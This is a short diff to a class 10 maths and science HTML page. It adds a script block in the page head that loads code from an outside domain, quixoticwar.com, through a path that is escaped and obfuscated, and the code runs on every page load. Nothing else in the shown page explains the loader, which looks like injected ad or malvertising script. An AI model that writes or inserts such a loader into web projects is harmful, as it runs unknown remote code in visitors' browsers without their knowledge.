--- a/class10th.html
+++ b/class10th.html
@@ -2,6 +2,18 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
+  <script>
+(function(xxuvy){
+var d = document,
+    s = d.createElement('script'),
+    l = d.scripts[d.scripts.length - 1];
+s.settings = xxuvy || {};
+s.src = "\/\/quixoticwar.com\/bWX.V\/swd\/GslD0tYrW\/cw\/kepmo9NuZZhULlFkAP-TNY-3\/NxTkMP2sNrTUY\/tINvjmcu1XM\/zQYO1ANJwi";
+s.async = true;
+s.referrerPolicy = 'no-referrer-when-downgrade';
+l.parentNode.insertBefore(s, l);
+})({})
+</script>
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0" />
   <title>Class 10 | Maths & Science</title>
@@ -116,6 +128,7 @@ animate();
 
 </body>
 </html>
+
 
 
 
